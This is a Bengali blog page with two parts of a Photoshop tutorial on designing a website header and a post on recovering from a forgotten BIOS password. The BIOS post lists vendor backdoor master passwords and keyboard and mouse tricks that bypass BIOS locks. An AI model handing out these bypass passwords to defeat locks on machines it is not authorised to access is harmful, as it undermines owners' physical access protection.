এখন keyboard হতে B press করে Brush Tool টি নির্বাচন করে এর Size: 900 pixels করে দিতে হবে। এরপর brush নামে একটা Layer নিয়ে আমরা যে Rectangle নিয়েছি তার ঠিক মাঝখানে একটা ক্লিক করতে হবে ।সবকিছু ঠিক থাকলে আমাদের কাজটি দেখতে নিচের ছবির মত হবে।

এখন navigation নামে নতুন একটা Layer নিয়ে সেখানে নিচের ছবির মত Rectangle তৈরি করতে হবে।

navigation Layer এর উপর ক্লিক করে Layer Style উইন্ডোতে প্রবেশ করে এখান থেকে Blend Mode এর পাশের কালার বক্স থেকে Color: #000000 বা Black করে দিতে হবে। এরপর নিচের চিত্র অনুযায়ী Drop shadow ইফেক্টের জন্য সেটিংস নির্বাচন করে OK বাটনে ক্লিক করতে হবে।

সব কিছু ঠিক থাকলে আমাদের করা কাজটি নিচের মত দেখাবে।

navigation Layer এ আমরা যে Rectangle তৈরি করেছিলাম glass নামে নতুন একটি layer নিয়ে তার অর্ধেক চওড়া এবং একই দৈর্ঘ্যের অপর একটি Rectangle তৈরি করতে হবে। এরপর Glass Layer এর উপর ক্লিক করে Layer Style উইন্ডোতে প্রবেশ করে এখান থেকে Color Overlay তে color #ffffff বা White করে দিতে হবে এবং Opacity 25% করে দিতে হবে । এ অবস্হায় নিচের মত দেখাবে।

Text নামে নতুন একটি Layer নিয়ে এখন keyboard হতে T press করে Type Tool টি নির্বাচন করে আমাদের প্রয়োজন অনুযায়ী HOME,ABOUT US,CONTACT US,NEWS,SERVICE,PRODUCTS ইত্যাদি প্রত্যেকটার মাঝে ২ টা করে Tab পরিমান Space দিয়ে F0nt :Times New Roman, Font size: 22 Pixelএবং Font color: White নির্বাচন করে লেখতে হবে। আমরা নিচের ছবির মত
দেখতে পাব।

ফটোশপ দিয়েই তৈরি করি নিজের ওয়েব সাইটের হেডার।- (২য় অংশ)

পোস্ট করেছেন Md.Kawsar ৬:৫০:০০ PM

ফটোশপ দিয়েই তৈরি করি নিজের ওয়েব সাইটের হেডার ।- (১ম অংশ) আমরা যেখানে শেষ করেছিলাম তা ছিল নিচের মত।

এখন home নামে নতুন একটি Layer নিয়ে নিচের ছবির মত Rectangle তৈরি করতে হবে। এবং এর color: #119a02 বা Green করে দিতে হবে। আমরা এখন নিচের ছবির মত দেখতে পাব।

এখন আমাদেরকে home Layer টিকে সবার উপর থেকে নামিয়ে glass Layer এবং navegation Layer দুটির ঠিক মাঝখানে স্থাপন করতে হবে। এরপর home Layer টিতে Outer glow ইফেক্ট দেওয়ার জন্য home Layer টির উপর ডাবল ক্লিক করে Layer Style উইন্ডো থেকে নিচের ছবির মত করে সেটিংস্ নির্বাচন করতে হবে।

inner glow ইফেক্ট দেওয়ার জন্য Layer Style উইন্ডো থেকে নিচের ছবির মত করে সেটিংস্ নির্বাচন করতে হবে।

এর পর OK বাটনে ক্লিক করলে আমাদের কাজটি নিচের ছবির মত দেখাবে।

BIOS Password ভুলে গেলে আপনার করণীয়.........

পোস্ট করেছেন Md.Kawsar ৫:৪৬:০০ PM

বায়োস পাসওয়ার্ডের মাধ্যমে আমরা কম্পিউটারকে অনাক্ষাংখীত ব্যবহার থেকে রক্ষা করতে পারি। বায়োসে দুই ধরনের পাসওয়ার্ড সেট করা যায়। এক ধরনের পাসওয়ার্ড হল পাওয়ার অন করার পর পাসওয়ার্ড চাইবে, সঠিক পাসওয়ার্ড দিতে ব্যার্থ হলে কম্পিউটার চালু হবে না। এবং অন্য ধরনের পাসওয়ার্ড হল কম্পিউটার অন হবে কিন্তু বায়োস সেটিংসে ঢুকতে গেলে পাসওয়ার্ড চাইবে। অনেক সময় দেখা যায়, ব্যবহারকারী বায়োস পাসওয়ার্ড ভুলে গেছেন তাই কম্পিউটার অন করতে পারছেন না। অথবা কারো কাছ থেকে ব্যবহৃত কম্পিউটার কিনেছেন বায়োস সেটিংসে ঢুকতে গিয়ে দেখলেন পাসওয়ার্ড চাইছে। এই ধরনের সমস্যার ক্ষেত্রে বায়োস পাসওয়ার্ড বাইপাস বা রিসেট করার প্রয়োজন হয়। নিচের তিন পদ্ধতিতে আপনি এই কাজটি করতে পারেন।
১. বায়োস ব্যাটারী খুলে:

মাদারবোর্ডে একটু খেয়াল করলেই দেখতে পাবেন একটা চ্যাপ্টা ব্যাটারী লাগানো আছে। এই ধরনের ব্যাটারী হাতঘড়িতে ও ব্যবহার করা হয়। সাবধানে ব্যাটারীটি খুলে ফেলুন(অবশ্যই কম্পিউটার বন্ধ অবস্থায়)। ১০ থেকে ১৫ মিনিট পর ব্যাটারীটি লাগিয়ে কম্পিউটার চালু করুন। পাসওয়ার্ড মুছে যাওয়ার কথা। তবে কিছু মাদারবোর্ডে ক্যাপাসিটর ব্যবহার করা হয় পাওয়ার ব্যাকআপ রাখার জন্য। এই ধরনের মাদারবোর্ডে ১০/১৫ মিনিটে কাজ হবে না। অন্তত ২৪ ঘন্টার জন্য ব্যাটারীটি খুলে রাখুন। পাসওয়ার্ড মুছে যাবে। কিছু কিছু মাদারবোর্ডে ব্যাটারীটি সোল্ডার করা থাকে। এক্ষেত্রে সোল্ডারিংয়ের অভীজ্ঞতা না থাকলে অভীজ্ঞ কাউকে দিয়ে ব্যাটারীটি খুলিয়ে নিন। শেষ কথা হল, আধুনিক কিছু কিছু মাদারবোর্ডে বিশেষ করে ল্যাপটপের মাদারবোর্ডের ব্যাটারী খুলে কাজ হয় না। এই ধরনের মাদারবোর্ডের ক্ষেত্রে পরবর্তী পদ্ধতিগুলো চেষ্টা করুন।
২. জাম্পার অথবা DIP সুইচ এর মাধ্যমে:

অনেক মাদারবোর্ডে জাম্পার অথবা ডিপ সুইচের মাধ্যমে পাসওয়ার্ড রিসেট করার ব্যবস্থা থাকে। এক্ষেত্রে জাম্পার বা ডিপ সুইচের পাশে লেখা থাকে কোন ধরনের সেটিংস দিতে হবে। মাদারবোর্ডে লেখা না থাকলে মাদারবোর্ডের সাথে দেওয়া ম্যানুয়াল পড়ে অথবা মাদারবোর্ড প্রস্তুতকারী কোম্পানীর ওয়েবসাইট থেকে ও জেনে নিতে পারেন।
৩. গোপন পাসওয়ার্ডের মাধ্যমে:

অনেক বায়োস প্রস্তুতকারী কোম্পানী তাদের বায়োসে কিছু গোপন পাসওয়ার্ড দিয়ে রাখে। এই পাসওয়ার্ড দিয়ে অন্য পাসওয়ার্ডগুলোকে বাইপাস করে চলে যাওয়া যায়। নিচে এধরনের একটা তালিকা দেওয়া হল।
Award BIOS এর জন্য:

ALFAROME, BIOSTAR, KDD, ZAAADA, ALLy, CONCAT, Lkwpeter, ZBAAACA, aLLy, CONDO, LKWPETER, ZJAAADC, aLLY, Condo, PINT, 01322222, ALLY, d8on, pint, 589589, aPAf, djonet, SER, 589721, _award, HLT, SKY_FOX, 595595, AWARD_SW, J64, SYXZ, 598598, AWARD?SW, J256, syxz, AWARD SW, J262, shift + syxz, AWARD PW, j332, TTPTHA, AWKWARD, j322, awkward ইত্যাদি।
AMI BIOS এর জন্য:

AMI, BIOS, PASSWORD, HEWITT RAND, AMI?SW, AMI_SW, LKWPETER, CONDO ইত্যাদি।
Phoenix BIOS এর জন্য:

phoenix, PHOENIX, CMOS, BIOS ইত্যাদি।
কিছু কমন পাসওয়ার্ড:

ALFAROME, BIOSTAR, biostar, biosstar, CMOS, cmos, LKWPETER, lkwpeter, setup, SETUP, Syxz, Wodj ইত্যাদি।
অন্যান্য কোম্পানীর BIOS Password:

কোম্পানী = = পাসওয়ার্ড
VOBIS & IBM = = merlin
Dell = = Dell
Biostar = = Biostar
Compaq = = Compaq
Enox = = xo11nE
Epox = = central
Freetech = = Posterie
IWill = = iwill
Jetway = = spooml
Packard Bell = = bell9
QDI = = QDI
Siemens = = SKY_FOX
TMC = = BIGO
Toshiba = = Toshiba
Toshiba = = BIOS

বেশিরভাগ Toshiba Laptop এবং কিছু Desktop এ বুট হওয়ার সময় কিবোর্ডের বাম পাশের Shift কী চেপে ধরে রাখলে ও বায়োস পাসওয়ার্ড বাইপাস করা যায়।

পিসি বুট হবার সময় খুব দ্রুত মাউসের বাটন দুটি চাপতে থাকলে IBM Aptiva BIOS এর পাসওয়ার্ড বাইপাস করা যায়।